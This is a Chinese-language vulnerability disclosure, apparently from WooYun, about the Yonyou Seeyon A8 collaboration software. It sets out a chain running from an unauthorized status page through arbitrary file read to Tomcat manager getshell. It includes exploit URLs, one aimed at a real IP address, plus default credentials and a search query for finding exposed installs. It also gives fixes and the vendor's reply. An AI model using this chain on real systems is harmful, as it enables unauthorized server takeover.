漏洞详情

披露状态:

2014-01-21: 细节已通知厂商并且等待厂商处理中
2014-01-22: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-04-18: 细节向公众公开

简要描述:

用友致远A8协同管理软件存在多个漏洞

详细说明:

1.敏感信息泄露

该地址为性能监控后台,存在未授权访问

http://x.x.x.x/seeyon/management/status.jsp





2.任意文件读取漏洞

由于对filename未进行过滤,导致可下载读取任意文件

http://x.x.x.x/seeyon/main.do?method=officeDown&filename=c:/boot.ini





3.tomcat manager Getshell

利用(1)中打印的环境变量可得到网站的绝对路径:

jx.jpg



结合(2)漏洞进行文件读取,读取tomcat-users.xml文件中的登陆用户名及密码进行登陆。如:

http://122.156.217.45:8080/seeyon/main.do?method=officeDown&filename=D:/UFSeeyon/A8/Group/ApacheJetspeed/conf/tomcat-users.xml



http://x.x.x.x/manager/html





<tomcat-users>
<role rolename="tomcat"/>
<role rolename="role1"/>
<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
<user username="both" password="tomcat" roles="tomcat,role1"/>
<user username="role1" password="tomcat" roles="role1"/>
<user username="seeyon" password="qwerasdf" roles="tomcat,role1,manager"/>
</tomcat-users>





tomcat.jpg



漏洞证明:

QQ截图20140120210208.jpg





很多客户在使用:

http://www.baidu.com/s?tn=baiduhome_pg&ie=utf-8&bs=%E6%9B%B4%E6%94%B9%E8%AF%AD%E8%A8%80%3A+A8%E4%BC%81%E4%B8%9A%E7%89%88+%28%E5%B9%B6%E5%8F%91%E6%95%B0%3A500%29+%E7%94%A8%E6%88%B7%E5%90%8D+%3A+%E5%AF%86%E7%A0%81%3A+%E8%BE%85%E5%8A%A9%E7%A8%8B%E5%BA%8F%E5%AE%89%E8%A3%85+www.seeyo&f=8&rsv_bp=1&wd=%E6%9B%B4%E6%94%B9%E8%AF%AD%E8%A8%80%3A+A8%E4%BC%81%E4%B8%9A%E7%89%88+%28%E5%B9%B6%E5%8F%91%E6%95%B0%3A500%29+%E7%94%A8%E6%88%B7%E5%90%8D+%3A+%E5%AF%86%E7%A0%81%3A+%E8%BE%85%E5%8A%A9%E7%A8%8B%E5%BA%8F%E5%AE%89%E8%A3%85+&rsv_sug3=1&rsv_sug4=59&inputT=343



222.jpg



修复方案:

1.性能监控后台进行授权访问;



2.对filename参数进严格过滤;



3.删除manager管理后台或禁止登陆;

(tomcat-users.xml中账号seeyon和密码qwerasdf为安装默认)

版权声明:转载请注明来源 loli@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-01-22 09:54

厂商回复:

非常感谢loli!
这个问题是在V3.10sp2出现的(2009年发布),我们从V3.12已经修复了这个漏洞(2010年发布),我们已经安排客户人员联系客户尽快升级。

最新状态:

暂无


漏洞评价: